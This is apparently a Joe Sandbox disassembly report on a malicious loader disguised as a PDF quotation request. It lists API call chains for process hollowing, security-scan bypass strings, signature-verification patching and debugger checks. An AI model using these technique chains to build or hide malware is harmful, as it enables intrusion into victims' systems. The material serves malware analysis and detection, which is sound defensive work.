call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2954d8c call 2954d9c call 29685dc 7688->7732 7841 29690b7-2969123 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7732->7841 7842 2969128-2969449 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2952ee0 call 2952f08 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 GetThreadContext 7732->7842 7841->7842 7842->7687 7950 296944f-29696b2 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2968254 7842->7950 8023 29699bf-2969a2b call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7950->8023 8024 29696b8-2969821 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29684c4 7950->8024 8051 2969a30-2969bb0 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29679b4 8023->8051 8114 2969823-2969849 call 29679b4 8024->8114 8115 296984b-29698b7 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 8024->8115 8051->7687 8155 2969bb6-2969caf call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2968ac0 8051->8155 8123 29698bc-29699bd call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29679b4 8114->8123 8115->8123 8123->8051 8206 2969d03-296a6f2 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2967d00 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2967d00 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 SetThreadContext NtResumeThread call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2952c2c call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29687a0 * 3 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29687a0 * 2 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 * 5 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 2967ed4 call 29687a0 * 2 8155->8206 8207 2969cb1-2969cfe call 29689b8 call 29689ac 8155->8207 8206->7687 8207->8206
                                                                  APIs
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                    • Part of subcall function 029685DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02968668
                                                                  • GetThreadContext.KERNEL32(00000868,029B1420,ScanString,029B13A4,0296A77C,UacInitialize,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,UacInitialize,029B13A4), ref: 02969442
                                                                    • Part of subcall function 02968254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029682C5
                                                                    • Part of subcall function 029684C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02968529
                                                                    • Part of subcall function 029679B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                  • API String ID: 4113022151-51457883
                                                                  • Opcode ID: 5531391daa7081357158c5626c1b03ce678d176342f5abaf2189bc7130b4ef20
                                                                  • Instruction ID: 72da8246688fc4146bcd90d536fac7187473f89b37cd35d4b26705b3088ddd7b
                                                                  • Opcode Fuzzy Hash: 5531391daa7081357158c5626c1b03ce678d176342f5abaf2189bc7130b4ef20
                                                                  • Instruction Fuzzy Hash: DAE20F35B502289BDB51EF64CDA5BEE73FABFC8710F1050A1D509A7254DA30EE858F90
                                                                  Function 02955A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 8510 2955a78-2955ab9 GetModuleFileNameA RegOpenKeyExA 8511 2955afb-2955b3e call 29558b4 RegQueryValueExA 8510->8511 8512 2955abb-2955ad7 RegOpenKeyExA 8510->8512 8517 2955b40-2955b5c RegQueryValueExA 8511->8517 8518 2955b62-2955b7c RegCloseKey 8511->8518 8512->8511 8514 2955ad9-2955af5 RegOpenKeyExA 8512->8514 8514->8511 8516 2955b84-2955bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8514->8516 8519 2955c9e-2955ca5 8516->8519 8520 2955bbb-2955bbf 8516->8520 8517->8518 8521 2955b5e 8517->8521 8523 2955bc1-2955bc5 8520->8523 8524 2955bcb-2955be1 lstrlenA 8520->8524 8521->8518 8523->8519 8523->8524 8525 2955be4-2955be7 8524->8525 8526 2955bf3-2955bfb 8525->8526 8527 2955be9-2955bf1 8525->8527 8526->8519 8529 2955c01-2955c06 8526->8529 8527->8526 8528 2955be3 8527->8528 8528->8525 8530 2955c30-2955c32 8529->8530 8531 2955c08-2955c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8519 8532 2955c34-2955c38 8530->8532 8531->8530 8532->8519 8533 2955c3a-2955c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8519 8534 2955c6c-2955c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8519
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02950000,0297D790), ref: 02955A94
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AB2
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02950000,0297D790), ref: 02955AD0
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02955AEE
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02955B37
                                                                  • RegQueryValueExA.ADVAPI32(?,02955CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02955B7D,?,80000001), ref: 02955B55
                                                                  • RegCloseKey.ADVAPI32(?,02955B84,00000000,?,?,00000000,02955B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02955B77
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02955B94
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02955BA1
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02955BA7
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02955BD2
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C19
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C29
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C51
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C61
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02955C87
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02955C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: 183713caacfe748d88069848254e8e168917eaf02a8fda8d00d45e8b95180c7f
                                                                  • Instruction ID: 791c93cf166cd88b87edc092f7da3ee763e9d6b22de07123bc2207bb6c305878
                                                                  • Opcode Fuzzy Hash: 183713caacfe748d88069848254e8e168917eaf02a8fda8d00d45e8b95180c7f
                                                                  • Instruction Fuzzy Hash: BF518271B4022C7EFB25D6A4CC46FEF77BD9B44744F8101A5AE04E61C2EB749A448FA1
                                                                  Function 029687A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10523 29687a0-29687c5 LoadLibraryW 10524 29687c7-29687df GetProcAddress 10523->10524 10525 296880f-2968815 10523->10525 10526 2968804-296880a FreeLibrary 10524->10526 10527 29687e1-2968800 call 2967d00 10524->10527 10526->10525 10527->10526 10530 2968802 10527->10530 10530->10526
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                  • API String ID: 1002360270-4067648912
                                                                  • Opcode ID: 5e9afe18070dfc213e4905cdb763f5e043911f05594570779d5b66ce767ef6c3
                                                                  • Instruction ID: 5b54a9a9a69b9ea8e8521b10e2909fc661f11e54f3fd4cef49dabc84990785da
                                                                  • Opcode Fuzzy Hash: 5e9afe18070dfc213e4905cdb763f5e043911f05594570779d5b66ce767ef6c3
                                                                  • Instruction Fuzzy Hash: 85F0C271EC92146EEB129B68AE5CFB633DCA7D13D9F04082AB50E87580E7B01814CB50
                                                                  Function 0296EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10540 296ebf0-296ec0a GetModuleHandleW 10541 296ec36-296ec3e 10540->10541 10542 296ec0c-296ec1e GetProcAddress 10540->10542 10542->10541 10543 296ec20-296ec30 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 296ec32 10543->10544 10544->10541
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 0296EC00
                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0296EC12
                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0296EC29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                  • API String ID: 35162468-539270669
                                                                  • Opcode ID: 0c7fef2c4f1573a26190bc62e4e5718f4017f2aba17ce1dc29ee592ff5485e99
                                                                  • Instruction ID: a3fbafbf0ccfc98e8354866fc1fc365857ddd1c41486222eaaedb7e10b23e046
                                                                  • Opcode Fuzzy Hash: 0c7fef2c4f1573a26190bc62e4e5718f4017f2aba17ce1dc29ee592ff5485e99
                                                                  • Instruction Fuzzy Hash: 56F0A774A0425CABD722E7A8888DFECFBEE5B05329F640394D464621C1E77906548751
                                                                  Function 0296DBB0 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02954ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02954EDA
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DBEB
                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DC1B
                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0296DC30
                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0296DC5C
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0296DC65
                                                                    • Part of subcall function 02954C0C: SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                  • String ID:
                                                                  • API String ID: 2659941336-0
                                                                  • Opcode ID: e77e5c0c5d0dd8b7959e44aae93ee1de00b57e210674cd0f2beb707af9e79d94
                                                                  • Instruction ID: 8998f390aa6f05b49e449870e80db9bfbaa777d799412e3e22a80b5d3f6521a6
                                                                  • Opcode Fuzzy Hash: e77e5c0c5d0dd8b7959e44aae93ee1de00b57e210674cd0f2beb707af9e79d94
                                                                  • Instruction Fuzzy Hash: FD21D375B503187AEB51EAE4CC46FEEB7FDAF88B00F500461B600F71C0DAB4AA458B65
                                                                  Function 0296E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0296E436
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: e617b74a297f3a1c332aff2d4828c04fc46de032ef5be1107fb8cfdc1308cfe9
                                                                  • Instruction ID: efaa88369ad377e0d21545aa013132922a23fcc3cb7616a90598693e82ed4024
                                                                  • Opcode Fuzzy Hash: e617b74a297f3a1c332aff2d4828c04fc46de032ef5be1107fb8cfdc1308cfe9
                                                                  • Instruction Fuzzy Hash: A3413E35B502189BEB50EFB4C891EAEB3FAFFCC710F215421E485A7640DA74AD458FA0
                                                                  Function 0296DACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02954ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02954EDA
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DB9E), ref: 0296DB0B
                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0296DB45
                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0296DB72
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0296DB7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocCloseCreateStringWrite
                                                                  • String ID:
                                                                  • API String ID: 3308905243-0
                                                                  • Opcode ID: 06bda8d2df54cfb0fc0c7103fd78163a4129943cc0fabb3b66710a6105bec0d5
                                                                  • Instruction ID: 17aaf5b27c478daf5e2220a40fd8b00a7e8e252be938cbacb2ed28f71ac13dac
                                                                  • Opcode Fuzzy Hash: 06bda8d2df54cfb0fc0c7103fd78163a4129943cc0fabb3b66710a6105bec0d5
                                                                  • Instruction Fuzzy Hash: A221ED71B40319BAEB50EAE4CC46FAEB7BDEB44B04F604461B614F71C0D7B06A048BA5
                                                                  Function 029685DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02968668
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                  • API String ID: 3130163322-2353454454
                                                                  • Opcode ID: 3d7659ce481e9e4f44c597afb605a9cd52358447f25fbd09a54baa5687b1a39d
                                                                  • Instruction ID: c66027aa3c3f3e802cd0b5ada53f6489a87fdbcb885505121abf9758004651c3
                                                                  • Opcode Fuzzy Hash: 3d7659ce481e9e4f44c597afb605a9cd52358447f25fbd09a54baa5687b1a39d
                                                                  • Instruction Fuzzy Hash: 121112B2644208AFEB81EFA8DD95FAA37EDFB8C700F514414FA08D3640D634E9108B24
                                                                  Function 029679B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
